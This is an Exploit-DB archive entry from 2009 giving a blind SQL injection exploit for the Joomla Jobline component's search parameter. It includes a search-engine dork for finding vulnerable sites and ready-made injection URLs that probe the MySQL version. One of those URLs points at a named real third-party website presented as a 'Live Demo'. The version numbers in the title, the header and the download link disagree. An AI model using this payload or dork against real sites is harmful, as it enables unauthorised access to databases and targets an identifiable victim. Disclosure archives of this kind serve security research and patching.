Joomla! Component Jobline 1.3.1 - Blind SQL Injection

EDB-ID:

9187




Platform:

PHP

Date:

2009-07-17


##################################################
# Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability
# Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip
# Dork: inurl:"index.php?option=com_jobline"
#  ---> magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################

Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=

[-] Exploit [+]

[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='

[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='


note:
<name>Jobline</name>
<creationDate>08 Jan 2008</creationDate>
<version>1.3.1</version>
<joomlaVersion>1.5</joomlaVersion>
<copyright>(c) 2006 Olle Johansson</copyright>
<license>GNU GPL</license>


# milw0rm.com [2009-07-17]